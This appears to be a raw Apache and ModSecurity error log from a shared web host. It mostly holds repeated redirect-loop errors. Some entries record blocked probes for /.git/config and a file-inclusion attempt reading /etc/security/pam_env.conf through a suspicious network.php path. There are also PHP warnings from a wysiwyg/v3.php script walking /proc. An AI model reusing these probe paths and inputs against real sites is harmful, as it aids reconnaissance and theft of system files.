[Mon May 11 18:45:21.696047 2026] [core:error] [pid 1412074:tid 1412093] [client 13.75.199.23:9663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:21.696212 2026] [core:error] [pid 1412074:tid 1412093] [client 13.75.199.23:9663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:22.513548 2026] [core:error] [pid 1411099:tid 1411123] [client 13.75.199.23:3359] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:22.513590 2026] [core:error] [pid 1411099:tid 1411123] [client 13.75.199.23:3359] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:23.374319 2026] [core:error] [pid 1416109:tid 1416129] [client 13.75.199.23:11130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:23.374385 2026] [core:error] [pid 1416109:tid 1416129] [client 13.75.199.23:11130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:24.160714 2026] [core:error] [pid 1412074:tid 1412078] [client 13.75.199.23:11104] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:24.160851 2026] [core:error] [pid 1412074:tid 1412078] [client 13.75.199.23:11104] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:24.963682 2026] [core:error] [pid 1424905:tid 1424928] [client 13.75.199.23:3596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:24.963720 2026] [core:error] [pid 1424905:tid 1424928] [client 13.75.199.23:3596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:25.724042 2026] [core:error] [pid 1424905:tid 1424918] [client 13.75.199.23:11084] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:25.724074 2026] [core:error] [pid 1424905:tid 1424918] [client 13.75.199.23:11084] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:26.530493 2026] [core:error] [pid 1411099:tid 1411102] [client 13.75.199.23:9645] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:26.530524 2026] [core:error] [pid 1411099:tid 1411102] [client 13.75.199.23:9645] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:27.312750 2026] [core:error] [pid 1411099:tid 1411121] [client 13.75.199.23:8625] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:27.312882 2026] [core:error] [pid 1411099:tid 1411121] [client 13.75.199.23:8625] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:28.084935 2026] [core:error] [pid 1416109:tid 1416150] [client 13.75.199.23:11095] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:28.084984 2026] [core:error] [pid 1416109:tid 1416150] [client 13.75.199.23:11095] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:39.770713 2026] [security2:error] [pid 1424905:tid 1424926] [client 146.56.199.139:51454] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "maelbailly.fr"] [uri "/"] [unique_id "agIHs4W8yzYoWG_eyCXFxAAAAVI"]
[Mon May 11 18:45:40.114003 2026] [security2:error] [pid 1411099:tid 1411122] [client 34.158.98.233:37278] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/.git/config"] [unique_id "agIHtA-Qm4vhlWBPlMjqgAAAABY"]
[Mon May 11 18:45:40.114500 2026] [security2:error] [pid 1411099:tid 1411122] [client 34.158.98.233:37278] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/.git/config"] [unique_id "agIHtA-Qm4vhlWBPlMjqgAAAABY"]
[Mon May 11 18:45:40.115519 2026] [security2:error] [pid 1411099:tid 1411122] [client 34.158.98.233:37278] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agIHtA-Qm4vhlWBPlMjqgAAAABY"]
[Mon May 11 18:45:46.934223 2026] [security2:error] [pid 1411099:tid 1411118] [client 146.56.199.139:43984] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agIHug-Qm4vhlWBPlMjqjgAAABI"], referer: http://maelbailly.fr
[Mon May 11 18:45:55.967425 2026] [authz_core:error] [pid 1412074:tid 1412078] [client 47.128.23.254:42952] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/Transport/error_log
[Mon May 11 18:46:36.293211 2026] [autoindex:error] [pid 1424905:tid 1424926] [client 194.163.167.152:59565] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 18:46:48.386544 2026] [autoindex:error] [pid 1416109:tid 1416149] [client 194.163.167.152:55013] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 18:46:56.792404 2026] [autoindex:error] [pid 1411055:tid 1411079] [client 194.163.167.152:50887] AH01276: Cannot serve directory /home/tcttelec/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 18:47:03.722943 2026] [autoindex:error] [pid 1416109:tid 1416139] [client 194.163.167.152:55400] AH01276: Cannot serve directory /home/tcttelec/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 18:48:22.282837 2026] [security2:error] [pid 1411099:tid 1411104] [client 216.73.216.110:19455] ModSecurity: Warning. Matched phrase "etc/security/pam_env.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/security/pam_env.conf found within ARGS:filesrc: /etc/security/pam_env.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIIVg-Qm4vhlWBPlMjrbgAAAAM"]
[Mon May 11 18:48:22.284180 2026] [security2:error] [pid 1411099:tid 1411104] [client 216.73.216.110:19455] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIIVg-Qm4vhlWBPlMjrbgAAAAM"]
[Mon May 11 18:48:22.380552 2026] [security2:error] [pid 1411099:tid 1411104] [client 216.73.216.110:19455] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIIVg-Qm4vhlWBPlMjrbgAAAAM"]
[Mon May 11 18:48:55.178205 2026] [:error] [pid 1416109:tid 1416137] [client 17.246.23.191:35324] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:49:32.755206 2026] [security2:error] [pid 1416109:tid 1416150] [client 43.157.149.188:55460] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/politique-de-confidentialite/"] [unique_id "agIInFV4kyjgo4bQBUiG1gAAANQ"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704668/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704668/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704668/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704668/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704668/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704668/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 18:49:44.482179 2026] [security2:error] [pid 1411201:tid 1411261] [client 34.65.58.9:41862] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "webshop.totalcloud.fr"] [uri "/.git/config"] [unique_id "agIIqPy_GXSWIKeli0sl6wAAAI8"]
[Mon May 11 18:49:44.482433 2026] [security2:error] [pid 1411201:tid 1411261] [client 34.65.58.9:41862] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "webshop.totalcloud.fr"] [uri "/.git/config"] [unique_id "agIIqPy_GXSWIKeli0sl6wAAAI8"]
[Mon May 11 18:49:45.449790 2026] [security2:error] [pid 1411201:tid 1411261] [client 34.65.58.9:41862] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIIqPy_GXSWIKeli0sl6wAAAI8"]
[Mon May 11 18:49:54.285093 2026] [core:error] [pid 1416109:tid 1416145] [client 4.193.137.131:11875] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:54.286834 2026] [core:error] [pid 1416109:tid 1416145] [client 4.193.137.131:11875] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:55.065540 2026] [core:error] [pid 1411099:tid 1411122] [client 4.193.137.131:11841] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:55.065706 2026] [core:error] [pid 1411099:tid 1411122] [client 4.193.137.131:11841] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:56.050905 2026] [core:error] [pid 1411201:tid 1411266] [client 4.193.137.131:11886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:56.050941 2026] [core:error] [pid 1411201:tid 1411266] [client 4.193.137.131:11886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:56.803669 2026] [core:error] [pid 1412074:tid 1412076] [client 4.193.137.131:11783] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:56.803713 2026] [core:error] [pid 1412074:tid 1412076] [client 4.193.137.131:11783] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:57.351795 2026] [core:error] [pid 1411201:tid 1411255] [client 4.193.137.131:11856] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:57.351832 2026] [core:error] [pid 1411201:tid 1411255] [client 4.193.137.131:11856] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:58.027427 2026] [core:error] [pid 1411099:tid 1411104] [client 4.193.137.131:11846] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:58.027566 2026] [core:error] [pid 1411099:tid 1411104] [client 4.193.137.131:11846] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:58.535678 2026] [core:error] [pid 1411201:tid 1411246] [client 4.193.137.131:11784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:58.535712 2026] [core:error] [pid 1411201:tid 1411246] [client 4.193.137.131:11784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:59.064363 2026] [core:error] [pid 1412074:tid 1412090] [client 4.193.137.131:11438] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:59.064584 2026] [core:error] [pid 1412074:tid 1412090] [client 4.193.137.131:11438] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:59.606253 2026] [core:error] [pid 1411055:tid 1411064] [client 4.193.137.131:11904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:49:59.606299 2026] [core:error] [pid 1411055:tid 1411064] [client 4.193.137.131:11904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:00.095840 2026] [core:error] [pid 1416109:tid 1416149] [client 4.193.137.131:11873] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:00.095954 2026] [core:error] [pid 1416109:tid 1416149] [client 4.193.137.131:11873] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:00.621410 2026] [core:error] [pid 1411201:tid 1411254] [client 4.193.137.131:11955] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:00.621522 2026] [core:error] [pid 1411201:tid 1411254] [client 4.193.137.131:11955] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:01.113957 2026] [core:error] [pid 1412074:tid 1412098] [client 4.193.137.131:11880] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:01.113990 2026] [core:error] [pid 1412074:tid 1412098] [client 4.193.137.131:11880] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:01.598123 2026] [core:error] [pid 1416109:tid 1416133] [client 4.193.137.131:11860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:01.598283 2026] [core:error] [pid 1416109:tid 1416133] [client 4.193.137.131:11860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:02.520347 2026] [core:error] [pid 1412074:tid 1412087] [client 4.193.137.131:11868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:02.520484 2026] [core:error] [pid 1412074:tid 1412087] [client 4.193.137.131:11868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:03.016455 2026] [core:error] [pid 1411055:tid 1411061] [client 4.193.137.131:11849] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:03.016492 2026] [core:error] [pid 1411055:tid 1411061] [client 4.193.137.131:11849] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:03.500555 2026] [core:error] [pid 1411201:tid 1411253] [client 4.193.137.131:11858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:03.500591 2026] [core:error] [pid 1411201:tid 1411253] [client 4.193.137.131:11858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:04.104435 2026] [core:error] [pid 1424905:tid 1424925] [client 4.193.137.131:11872] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:04.104479 2026] [core:error] [pid 1424905:tid 1424925] [client 4.193.137.131:11872] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:04.596877 2026] [core:error] [pid 1412074:tid 1412084] [client 4.193.137.131:11793] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:04.596917 2026] [core:error] [pid 1412074:tid 1412084] [client 4.193.137.131:11793] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:05.101976 2026] [core:error] [pid 1416109:tid 1416142] [client 4.193.137.131:11869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:05.102027 2026] [core:error] [pid 1416109:tid 1416142] [client 4.193.137.131:11869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:05.590725 2026] [core:error] [pid 1411099:tid 1411124] [client 4.193.137.131:11851] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:05.590768 2026] [core:error] [pid 1411099:tid 1411124] [client 4.193.137.131:11851] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:06.070686 2026] [core:error] [pid 1412074:tid 1412094] [client 4.193.137.131:11808] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:06.070927 2026] [core:error] [pid 1412074:tid 1412094] [client 4.193.137.131:11808] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:06.515181 2026] [authz_core:error] [pid 1424905:tid 1424916] [client 52.242.216.199:58452] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-patterns/error_log
[Mon May 11 18:50:06.560196 2026] [core:error] [pid 1424905:tid 1424917] [client 4.193.137.131:11835] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:06.560229 2026] [core:error] [pid 1424905:tid 1424917] [client 4.193.137.131:11835] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:07.066448 2026] [core:error] [pid 1412074:tid 1412097] [client 4.193.137.131:11856] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:07.066480 2026] [core:error] [pid 1412074:tid 1412097] [client 4.193.137.131:11856] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
